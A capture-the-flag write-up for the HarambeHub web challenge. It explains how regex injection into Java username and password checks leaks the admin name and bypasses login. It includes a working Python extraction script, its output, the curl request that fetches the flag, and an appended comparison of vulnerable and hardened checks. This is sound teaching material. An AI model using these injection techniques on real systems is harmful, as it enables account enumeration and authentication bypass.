ctfx [Web] - HarambeHub [100pts]


This site was created in honor of harambe: http://problems.ctfx.io:7003/
Problem author: omegablitz
HarambeHub.java
User.java

Two Java files are given. Analysing both, we can see that the first file has an if condition that uses string.match on the username to check whether it already exists. Knowing this, we can recover the admin username character by character with a Python script by injecting regex.


import requests
import string

URL = 'http://problems.ctfx.io:7003/users'
EXISTS = "FAILED: User with that name already exists!"

# Character classes probed first; a matching class narrows the characters to try next.
lower_alpha = '[a-z]'
upper_alpha = '[A-Z]'
digits = '[0-9]'
special = r'[^\w]'
classes = [lower_alpha, upper_alpha, digits, special]
candidates = {
    lower_alpha: string.ascii_lowercase,
    upper_alpha: string.ascii_uppercase,
    digits: string.digits,
    special: string.punctuation + string.whitespace,
}


def exists(pattern):
    """Submit a registration whose username is a regex; the server answers
    'already exists' when the pattern matches a stored username.
    Retries until a 200 response comes back."""
    while True:
        a = requests.post(URL, data={'username': pattern, 'password': 'a', 'realname': 'a'})
        if a.status_code == 200:
            return EXISTS in a.text


username = ''       # recovered name so far, regex metacharacters escaped
regex_string = ''   # recovered name so far as a sequence of character classes
regex_found = True
while regex_found:
    regex_found = False
    for r in classes:
        # Does the next character of an existing username fall in class r?
        if not exists('^%s.*' % (regex_string + r)):
            continue
        regex_found = True
        regex_string += r
        # Pin down the exact character by trying each member of that class.
        for x in candidates[r]:
            if x in r'\.[]{}()*+-?^$|':
                x = '\\' + x  # escape so the character is matched literally
            if exists('^(%s).*' % (username + x)):
                username += x
                print("The username: " + username)
                break

kinyabitch@Debian ~/h/c/c/web2> python a.py
The username: \[
The username: \[A
The username: \[Ad
The username: \[Adm
The username: \[Admi
The username: \[Admin
The username: \[Admin\]
The username: \[Admin\]
The username: \[Admin\] A
The username: \[Admin\] Ar
The username: \[Admin\] Arx
The username: \[Admin\] Arxe
The username: \[Admin\] Arxen
The username: \[Admin\] Arxeni
The username: \[Admin\] Arxenix
The username: \[Admin\] Arxenixi
The username: \[Admin\] Arxenixis
The username: \[Admin\] Arxenixisa
The username: \[Admin\] Arxenixisal
The username: \[Admin\] Arxenixisalo
The username: \[Admin\] Arxenixisalos
The username: \[Admin\] Arxenixisalose
The username: \[Admin\] Arxenixisaloser

In the second file we can see the same thing being done with the password, so now that we have the admin username we can just inject the regex ^.* as the password and get the flag :)


kinyabitch@Debian /v/w/html> curl 'http://problems.ctfx.io:7003/name?username=\[Admin\]%20Arxenixisaloser&password=^.*'
ctf(h4r4mb3_d1dn1t_d13_4_th1s_f33ls_b4d)
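As an added example (not code from the challenge or from this writeup), the username and password checks modelled in Python: the flawed form that compiles user input as a pattern, next to the equality-based form that closes the yes/no oracle. The user store, names and passwords are constructed; Java's String.matches is a whole-string match, which re.fullmatch mirrors.

```python
import re
import hmac

# Constructed user store standing in for the challenge's registered users (example data).
USERS = {"[Admin] Arxenixisaloser": "s3cret", "alice": "hunter2"}


def name_exists_vulnerable(submitted: str) -> bool:
    """Models the flawed check: the submitted name is treated as a regex and
    matched against every stored username, like stored.matches(submitted) in Java.
    Every 'already exists' answer then leaks one bit about the stored names."""
    try:
        return any(re.fullmatch(submitted, stored) for stored in USERS)
    except re.error:
        return False  # malformed pattern: treated as 'no such user'


def name_exists_safe(submitted: str) -> bool:
    """Hardened check: the input is data compared for equality, never compiled."""
    return submitted in USERS


def name_exists_safe_regex(submitted: str) -> bool:
    """If a regex engine must be involved, quote the input first
    (re.escape here, Pattern.quote in Java) so metacharacters are literal."""
    return any(re.fullmatch(re.escape(submitted), stored) for stored in USERS)


def password_ok_vulnerable(username: str, submitted: str) -> bool:
    """Same flaw on the login path: the submitted password is the pattern."""
    stored = USERS.get(username)
    try:
        return stored is not None and re.fullmatch(submitted, stored) is not None
    except re.error:
        return False


def password_ok_safe(username: str, submitted: str) -> bool:
    """Constant-time literal comparison; '^.*' is just a three-character string."""
    stored = USERS.get(username)
    return stored is not None and hmac.compare_digest(stored, submitted)


if __name__ == "__main__":
    # A class probe is answered 'yes' by the flawed check and 'no' by the safe one.
    print("vulnerable ^\\[A.* :", name_exists_vulnerable(r"^\[A.*"))
    print("safe       ^\\[A.* :", name_exists_safe(r"^\[A.*"))
    # The flawed check also rejects the real name, because [Admin] is a character class.
    print("vulnerable literal :", name_exists_vulnerable("[Admin] Arxenixisaloser"))
    print("vulnerable pw ^.*  :", password_ok_vulnerable("[Admin] Arxenixisaloser", "^.*"))
    print("safe pw ^.*        :", password_ok_safe("[Admin] Arxenixisaloser", "^.*"))
```

Note that the flawed check also fails legitimate users whose names contain metacharacters, which is why the script above had to submit `\[Admin\]` rather than `[Admin]`.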